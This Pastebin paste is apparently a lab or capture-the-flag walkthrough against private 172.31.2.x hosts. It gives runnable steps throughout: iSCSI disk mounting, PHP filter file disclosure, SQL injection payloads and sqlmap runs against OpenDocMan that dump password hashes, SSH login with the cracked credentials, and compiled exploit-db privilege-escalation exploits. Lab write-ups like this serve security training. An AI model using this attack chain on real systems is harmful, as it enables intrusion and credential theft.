joemccray

217 attack steps

Dec 20th, 2017
1,096
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.14 KB | None | 0 0
  1. How to go after 172.31.2.238
  2. Reference: https://t0w3ntum.com/2017/01/07/baffle/
  3.  
  4.  
  5. ---------------------------------------------------------------
  6. sudo nmap -sV -p 3260 172.31.2.217
  7.  
  8.  
  9. sudo apt install open-iscsi
  10.  
  11. sudo iscsiadm -m discovery -t st -p 172.31.2.217
  12.  
  13. sudo iscsiadm -m discovery -t st -p 172.31.2.217:3260
  14.  
  15. sudo iscsiadm -m node -p 172.31.2.217 --login
  16.  
  17. sudo /bin/bash
  18.  
  19. fdisk -l
  20. ***** look for /dev/sda5 - Linux swap / Solaris *******
  21.  
  22. mkdir /mnt/217vm
  23.  
  24. mount /dev/sdb /mnt/217vm
  25.  
  26. cd /mnt/217vm
  27.  
  28. ls
  29.  
  30. cat flag1.txt
  31.  
  32. file bobsdisk.dsk
  33.  
  34. mkdir /media/bobsdisk
  35.  
  36. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  37.  
  38. /mnt/217vm# ls
  39.  
  40. cd /media/bobsdisk/
  41.  
  42. ls
  43.  
  44. cat ToAlice.eml
  45.  
  46. file bobsdisk.dsk
  47.  
  48. mkdir /media/bobsdisk
  49.  
  50. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  51.  
  52. /mnt/217vm# ls
  53.  
  54. cd /media/bobsdisk/
  55.  
  56. ls
  57.  
  58. cat ToAlice.eml
  59.  
  60. file ToAlice.csv.enc
  61.  
  62. file bobsdisk.dsk
  63.  
  64. pwd
  65.  
  66. mkdir /media/bobsdisk
  67.  
  68.  
  69. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  70.  
  71. ls
  72.  
  73. cd /media/bobsdisk/
  74.  
  75. ls
  76.  
  77. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  78.  
  79. ls
  80.  
  81. cat ToAlice.eml | grep flag
  82.  
  83. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  84.  
  85. ls
  86.  
  87. cat ToAlice.eml
  88. ***** look for supercalifragilisticoespialidoso ******
  89.  
  90. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  91.  
  92. supercalifragilisticoespialidoso
  93.  
  94.  
  95. ls
  96.  
  97. cat ToAlice.csv
  98.  
  99. -----------------------------------------------------
  100. Web Path,Reason
  101. 5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
  102. c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
  103. flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?
  104.  
  105. -----------------------------------------------------
  106.  
  107. The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
  108. http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
  109. -- view source
  110.  
  111. Found this string in the source:
  112. R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
  113. ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
  114. bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
  115. YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
  116. ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
  117. YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
  118. TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
  119. IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
  120. ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
  121. IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK
  122.  
  123. ------ https://www.base64decode.org/ -------
  124. ------ Decoded, but didn't find a flag -----
  125.  
  126.  
  127. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
  128. -- view source --
  129. -- Nothing in source --
  130.  
  131. Browsed to the flag link:
  132. view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
  133. -- view source --
  134. -- Nothing in source --
  135.  
  136.  
  137. Tried a PHP base64 decode with the URL:
  138. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
  139. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
  140. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php
  141.  
  142. ------ https://www.base64decode.org/ -------
  143. Use the string found here:
  144. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
  145.  
  146. -------------------------------------------------------------------
  147. PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==
  148. -------------------------------------------------------------------
  149. <?php
  150. defined ('VIAINDEX') or die('Ooooh! So close..');
  151. ?>
  152. <h1>Flag</h1>
  153. <p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
  154. <img src="trollface.png" />
  155. <?php
  156. // Ok, ok. Here's your flag!
  157. //
  158. // flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
  159. //
  160. // Well done, you're doing great so far!
  161. // Next step. SHELL!
  162. //
  163. //
  164. // Oh. That flag above? You're gonna need it...
  165. ?>
  166.  
  167.  
  168.  
  169.  
  170.  
  171. ============================================ Attacking another server because I need a reverse shell =========================================
  172. ---------------------------------------------------------------------------------------------------------------------------------------------------------
  173.  
  174. Attack steps:
  175. -------------
  176.  
  177.  
  178.  
  179. Step 1: Ping sweep the target network
  180. -------------------------------------
  181.  
  182.  
  183. ---------------------------Type This-----------------------------------
  184. nmap -sP 172.31.2.0/24
  185. -----------------------------------------------------------------------
  186.  
  187.  
  188.  
  189. - Found 3 hosts
  190. 172.31.2.64
  191. 172.31.2.217
  192. 172.31.2.238
  193.  
  194.  
  195.  
  196. Step 2: Port scan target system
  197. -------------------------------
  198.  
  199.  
  200. ---------------------------Type This-----------------------------------
  201. nmap -sV 172.31.2.64
  202. -----------------------------------------------------------------------
  203.  
  204.  
  205.  
  206. -------------Scan Results--------------------------------------------
  207. PORT STATE SERVICE VERSION
  208. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
  209. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  210. 514/tcp filtered shell
  211. 1037/tcp filtered ams
  212. 6667/tcp open irc ngircd
  213. Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  214. --------------------------------------------------------------------
  215.  
  216.  
  217. Step 3: Vulnerability Scan the webserver
  218. ----------------------------------------
  219.  
  220.  
  221. ---------------------------Type This-----------------------------------
  222. cd ~/toolz/
  223.  
  224. rm -rf nikto*
  225.  
  226. git clone https://github.com/sullo/nikto.git Nikto2
  227.  
  228. cd Nikto2/program
  229.  
  230. perl nikto.pl -h 172.31.2.64
  231. -----------------------------------------------------------------------
  232.  
  233.  
  234. Step 4: Run dirbuster or similar directory bruteforce tool against the target
  235. -----------------------------------------------------------------------------
  236.  
  237.  
  238. ---------------------------Type This-----------------------------------
  239. wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
  240.  
  241. perl Webr00t.pl -h 172.31.2.64 -v
  242. -----------------------------------------------------------------------
  243. or with dirbuster (dirb)
  244.  
  245. ---------------------------Type This-----------------------------------
  246. git clone https://github.com/v0re/dirb.git
  247.  
  248. cd dirb/
  249.  
  250. ./configure
  251.  
  252. make
  253.  
  254. dirb
  255.  
  256. ./dirb http://172.31.2.64 wordlists/big.txt
  257. -----------------------------------------------------------------------
  258.  
  259.  
  260.  
  261. Step 5: Browse the web site to look for clues
  262. ---------------------------------------------
  263. Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
  264.  
  265.  
  266. ..... really didn't get much from here so we just opened the web page in a browser
  267. http://172.31.2.64/
  268.  
  269. .....browsed to the webpage and saw that it pointed to:
  270. http://172.31.2.64/jabc
  271.  
  272. ....clicked on documentation link and found hidden text that pointed to here:
  273. http://172.31.2.64/jabcd0cs/
  274.  
  275. ....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
  276. https://www.exploit-db.com/exploits/32075/
  277.  
  278. Tried the sql injection described in exploit-db:
  279. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
  280.  
  281. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
  282.  
  283.  
  284.  
  285. Tried to run sqlmap against the target
  286.  
  287.  
  288. ---------------------------Type This-----------------------------------
  289. cd sqlmap-dev/
  290. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql
  291.  
  292. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql
  293.  
  294. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql
  295.  
  296. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql
  297.  
  298. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
  299. -----------------------------------------------------------------------
  300.  
  301.  
  302.  
  303. FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
  304. FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net
  305.  
  306.  
  307.  
  308. ---------------------------Type This-----------------------------------
  309. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql
  310.  
  311. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
  312. -----------------------------------------------------------------------
  313.  
  314. username: webmin
  315. hash: b78aae356709f8c31118ea613980954b
  316.  
  317. https://hashkiller.co.uk/md5-decrypter.aspx
  318.  
  319. hash: b78aae356709f8c31118ea613980954b
  320. pass: webmin1980
  321.  
  322.  
  323. ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.
  324.  
  325.  
  326.  
  327. ---------------------------Type This-----------------------------------
  328. ssh -l webmin 172.31.2.64
  329. webmin1980
  330.  
  331. id
  332.  
  333. cat /etc/*release
  334. -----------------------------------------------------------------------
  335.  
  336.  
  337.  
  338. ....tired of not having a real command shell...
  339.  
  340.  
  341. ---------------------------Type This-----------------------------------
  342. python -c 'import pty;pty.spawn("/bin/bash")'
  343.  
  344.  
  345. cd /tmp
  346.  
  347. pwd
  348.  
  349.  
  350. cat >> exploit.c << out
  351.  
  352. **************paste in the content from here *****************
  353. https://www.exploit-db.com/raw/39166/
  354.  
  355.  
  356. ------ hit enter a few times ------
  357.  
  358. ------ then type 'out' ----- this closes the file handle...
  359.  
  360.  
  361.  
  362. ---------------------------Type This-----------------------------------
  363. gcc -o boom exploit.c
  364.  
  365. ./boom
  366. -----------------------------------------------------------------------
  367.  
  368.  
  369. ------------exploit failed, damn let's try another one ---------
  370.  
  371.  
  372.  
  373. ---------------------------Type This-----------------------------------
  374. cat >> exploit2.c << out
  375.  
  376. **************paste in the content from here *****************
  377. https://www.exploit-db.com/raw/37292/
  378.  
  379.  
  380. out
  381.  
  382.  
  383. gcc -o boom2 exploit2.c
  384.  
  385. ./boom2
  386.  
  387. id
  388.  
  389.  
  390. ......YEAH - do the happy dance!!!!
  391. =============================================== Now back to the previous server ==============================================================
Add Comment
Please, Sign In to add comment